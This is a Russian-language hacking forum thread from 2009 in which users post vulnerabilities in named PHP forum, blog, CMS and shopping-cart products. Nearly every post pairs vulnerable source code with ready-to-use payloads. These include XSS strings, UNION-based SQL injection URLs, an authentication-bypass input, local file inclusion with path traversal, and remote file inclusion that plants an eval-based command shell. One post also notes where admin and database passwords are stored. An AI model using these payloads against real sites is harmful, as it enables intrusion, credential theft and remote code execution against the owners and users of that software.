
17.11.2009, 23:57
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
С нами:
8700497
Репутация:
388
|
|
BMForum 5.6
Активная xss:
/messenger.php?job=write
в модуле личных сообщений.
В поле "Содержание" пишем:
"><script>alert()</script>
и отправляем.
Активная xss:
/post.php?forumid=[number_forum]
при создании нового Топика.
В поле "Заголовок" пишем:
"><script>alert()</script>
и добавляем. Так же работает в поле "Описание".
Активная xss:
/profile.php
в Профиле. В полях:
-Номер MSN
-Подпись
-Домашняя страница
-Информация о себе
пишем
"><script>alert()</script>
. Будет видно при просмотре Тем с вашими сообщениями и у вас в профиле.
Пассивная xss:
http://localhost/plugins.php?p=tags&jinhua=&listby=&tagname=[tag]&forumid=[id]&page=%22%3E%3Cscript%3Ealert()%3C/script%3E
Так же в наличии несколько sql - инъекций, но на форуме их уже выкладывали.
Последний раз редактировалось Bb0y; 18.11.2009 в 14:40..
Причина: Поправка
|
|
|
PHPMySpace Gold Edition 8.0 |

18.11.2009, 18:26
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
PHPMySpace Gold Edition 8.0
PHPMySpace Gold Edition 8.0
From ROA with Love
Пассивная XSS
/modules/ecal/display.php?day=1&month=11&year=<script>alert();</script>
/modules/memberslist/index.php?letter=All&sortby=name&orderby=ASC&query ='><script>alert();</script>
Раскрытие путей
/modules/xtremuserguestbook/sign.php?gbid[]=1
/modules/ecal/display.php?day=1&month[]=11
|
|
|

18.11.2009, 21:53
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
2z Project
Активная XSS
В комментариях к новости:
[img=javascript:alert()][/img]
Раскрытие путей
/?action=search&author=&catid=0&postdate=&search[]=12
|
|
|

19.11.2009, 16:14
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
С нами:
9285506
Репутация:
1463
|
|
FreeBlog 0.2
http://sourceforge.net/projects/freeblog
SQL
afficher_commentaire.php
PHP код:
if (isset($_GET['id']))
{
$id = $_GET['id'];
$query="SELECT * FROM commentaires WHERE id_article='$id' && approuve=1 order by id DESC";
mq=off
http://localhost/FreeBlog/afficher_commentaire.php?id=1'+union+select+1,2,ve rsion(),4,5,6,user(),8+--+
|
|
|

19.11.2009, 20:35
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
С нами:
9285506
Репутация:
1463
|
|
wellyblog-version-0.8.1
sourceforge.net/projects/wellyblog/
Обход авторизации
password.php
PHP код:
$email = $_POST['email'];
$tempsql="select username, password from tbluser where email='".$email."'";
$rspass=mysql_query($tempsql);
$num_rows=mysql_num_rows($rspass);
if($num_rows>0){
$decryptedpass=decrypt(mysql_result($rspass, 0, "password"), mysql_result($rspass, 0, "username"));
mq=off
$_POST['email']=bla@bla.com' or 1=1 limit 0,1 --
|
|
|

20.11.2009, 00:36
|
|
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
С нами:
9285506
Репутация:
1463
|
|
profitCode Shopping Cart
Release Date:2009-04-11
http://sourceforge.net/projects/profbiz-cart/
http://profbiz-cart.sourceforge.net/
LFI
cart.php
PHP код:
global $chckoutaction, $payMethod, $donecart, $itemcount, $thmbImgsize, $ckprvd;
include "mainincs/cartfunctions.php";
if($ckprvd) {
include ("checkouts/checkout_" . $ckprvd . ".php");
в checkouts/ есть файл checkout_cod.php, достраиваем констукцию до него
можно инклудить файлы .php
http://localhost/store/cart.php?ckprvd=cod.php/../../leftmenu
NULL-byte слешируется, поэтому для иклуда произвольного файла используем Альтернативу от Raz0r,
в моем случае это 270 точек (Windows)
Код HTML:
http://localhost/store/cart.php?ckprvd=cod.php/../../../../../../../boot.ini..............................................................................................................................................................................................................................................................................
RFI
index.php
PHP код:
else if($proMod) {
include "$proMod" . ".php";
http://localhost/store/index.php?proMod=data:,%3C?php%20eval($_REQUEST[cmd]);%20?%3E&cmd=phpinfo();
Пароли администратора и к базе хранятся в adminshop/config/shopSettings.php
|
|
|

20.11.2009, 01:22
|
|
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами:
8850336
Репутация:
330
|
|
PIXE CMS VERSION 1.02
Ну вот наконец то вырвался я из бана
Уязвимость присутствует в скрипте index.php (и не только):
Уязвимый код:
PHP код:
...
include "admin/lang/".$language.".php";
...
Эксплатация:
Код:
http://localhost/22/index.php?language=../../../../FILE%00
Для эксплатации понадобится register_globals = ON
|
|
|

21.11.2009, 02:06
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Product: WEngine
Version: 1.0
Author: http://hot.ee
SQL-inj
file: /modules/news/index.php
PHP код:
$read = $_GET['read'];
$newssql = "select * from news where news_id = '$read'";
$newsresult = mysql_query($newssql);
$newsrow = mysql_fetch_array($newsresult);
target: ?read=1'+union+select+1,2,3,version()/*
file: user.php
PHP код:
$login = $_POST['login'];
$password = $_POST['password'];
$email = $_POST['email'];
$entersql = "SELECT * FROM users WHERE user_name = '$login'";
$enterresult = mysql_query($entersql);
...
$entersql = "SELECT user_password FROM users WHERE user_name = '$login'";
Передача идет методом POST.
target: ?login=user'+union+select+1,2,3,4,5/*
file: mail.php
PHP код:
$send = $_GET['sendid'];
$mail = $_GET['mail'];
if($mail == ""):
print("Вы не ввели email!");
exit;
endif;
$newssql = "select * from news where news_id = '$send'";
target: ?send=1'+union+select+1,version(),database(),4/*
Sql-inj не совсем обычная,вывод будет у вас на E-mail,так что его нужно вводить рабочий.
file: print.php
PHP код:
$print = $_GET['print'];
$newssql = "select * from news where news_id = '$print'";
$newsresult = mysql_query($newssql);
$newsrow = mysql_fetch_array($newsresult);
printf("<b>%s</b><hr>", $newsrow['news_name']);
target: ?print=1'+union+select+1,version(),3,4/*
Так-же уязвимы еще некоторые файлы,но выкладывать это не вижу смысла,так как все скули однотипные.Для некоторых уязвимостей,необходимо MQ = off дабы кавычки пролетали свободно.
Последний раз редактировалось m0Hze; 21.11.2009 в 09:29..
|
|
|

21.11.2009, 03:01
|
|
Новичок
Регистрация: 15.11.2009
Сообщений: 8
С нами:
8677322
Репутация:
79
|
|
PyLucid CMS
Passive XSS
/_command/19/RSSfeedGenerator/download/RSS.xml?count=>>''<script>alert(xss)</script
здесь же и раскрыте путей
/_command/19/RSSfeedGenerator/download/RSS.xml?count=
(с) Twin $park
Последний раз редактировалось Twin $park; 01.01.2010 в 22:45..
|
|
|

21.11.2009, 12:51
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
С нами:
9223466
Репутация:
3171
|
|
Product: Mini-CWB CMS
Author: GraFX Software Solutions (GPL)
Version: 2.1.1
LFI
file: all (!)
PHP код:
if (!isset($_SESSION['session_lang']))
{
$session_lang = $LANG;
$_SESSION['session_lang']=$session_lang;
}
else
$session_lang=$_SESSION['session_lang'];
include_once(INDEX_PATH."cls_fast_template.php");
$NEWLANG = $session_lang;
include_once(INCLUDE_LANGUAGE_PATH.$NEWLANG.".inc.php"); // а вот и инклуд.
target: Создаем запрос,где подменяем параметр сесии с названием session_lang на запрос инклуда файла.Пример: session_lang=file.php%00
MQ=off, ../ не фильтруеться.
Последний раз редактировалось m0Hze; 21.11.2009 в 14:01..
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Библиотека
|
SladerNon |
Болталка |
17 |
05.02.2007 23:30 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|